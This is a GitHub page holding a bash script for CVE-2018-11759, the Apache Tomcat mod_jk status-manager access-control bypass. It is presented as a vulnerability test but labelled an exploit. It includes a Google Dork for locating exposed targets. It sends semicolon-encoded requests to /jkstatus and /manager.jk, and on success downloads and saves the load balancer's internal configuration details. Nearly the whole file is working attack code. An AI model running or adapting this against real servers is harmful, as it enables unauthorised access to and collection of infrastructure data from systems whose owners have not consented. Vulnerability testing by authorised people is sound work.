-
Notifications
You must be signed in to change notification settings - Fork 2
/
main
96 lines (87 loc) · 3.12 KB
/
main
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
#!/bin/bash
# CVE 2018-11759
# Author: Julio Lira <[email protected]>
# Colaborator: Fernando Eloi <[email protected]>
# date: 12/07/2018 | MM/DD/YYYY
# License: GNU GPL version 3
# Details: https://jul10l1r4.github.io/artigo/Vulnerabilidade-em-balanceadores-mod_jk-[CVE-2018-11759]/index.html
# Description: This script was a test for verify if the application is vulnerable at CVE 2018-11759.
# Google Dork: ["JK Status Manager for"]
# Vendor Homepage: [http://tomcat.apache.org/]
# Exploit Link: [https://github.com/Jul10l1r4/Identificador-CVE-2018-11759]
# Version: [0.1]
# Tested on: [Slackware, Debian, Redhat, is compatible for all unix-like including Mac OS and others]
# Dependencies: curl, which
# CVE : [CVE-2018-11759]
# Ignore case for answ.
shopt -s nocasematch
# Fucking banner
printf "\033[32m"
cat << "EOF"
____ _____ ______ ___ _ ___ _ _ _____ ____ _____
/ ___|| ___/ |___ \ / _ \/ |( _ ) / / |___ | ___|/ _ \ \
\___ \| |_ | | __) | | | | |/ _ \ _____| | | / /|___ | (_) | |
___) | _< < / __/| |_| | | (_) |_____| | | / / ___) \__, | > >
|____/|_| | ||_____|\___/|_|\___/ |_|_|/_/ |____/ /_/| |
\_\ /_/
By Segment Fault.
EOF
# Function for save all details of load balancer
_save(){
# Verify if exists curl in machine
which curl > /dev/null && \
printf '\n Curl found \n' || \
printf '\n \033[31mInstall the Curl\033[0m\n';
# Make a download of details and redirect for directory
# files_cap/
echo -e '\033[32m Benning to download of details for load-balancer\033[0m'
cat <<- EOF > files_cap/$(echo "$1" | cut -d "/" -f 3).data
$(curl "$1/jkstatus;?mime=prop")
EOF
> /dev/null
# show msg of OK
echo -e "\n \033[32mDetails has been saved in files_cap/$(echo "$1" | cut -d "/" -f 3).data\033[0m"
}
# Function for send request
_req(){
jks=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "$1/jkstatus%3B" &3>/dev/null)
echo "Response: $jks on /jkstatus"
mjk=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "$1/manager.jk%3B" &3>/dev/null)
echo "Response: $mjk on /manager.jk"
if [ $mjk != 404 ];then
url="$1/manager.jk%3B"
response=$mjk
elif [ $jks != 404 ];then
url="$1/jkstatus%3B"
response=$jks
fi
}
# Help
if [ "$1" == "--help" ]
then
echo -e """
\033[32mOpen the main and follow the way
For more details read the README.md or
access https://github.com/Jul10l1r4/Identificador-CVE-2018-11759\033[0m"""
fi
# This all is in portugues of brazil, learning or translate for u :)
while read -p "Paste the URL -> " LINE; do
# Get status response of http and verify
if [[ "$LINE" =~ ^http ]];
then
echo "Format ok"
else
printf "The host use SSL? (y/n)→ "
read $use
[ "$use" == "y" ] && export LINE="https://$LINE" || export LINE="http://$LINE"
fi
_req "$LINE"
if [ $response = 200 ];then
echo -e "\n \033[31m[Vul]\033[0m\n See: $url"
_save "$url"
elif [ $response = 302 ] || [ $response = 401 ];then
echo -e "\n Safe, but can suffer attack\n brute-force, caution\n See: $url"
else
printf "\n \033[032mSafe, conglats!\033[0m\n"
fi
done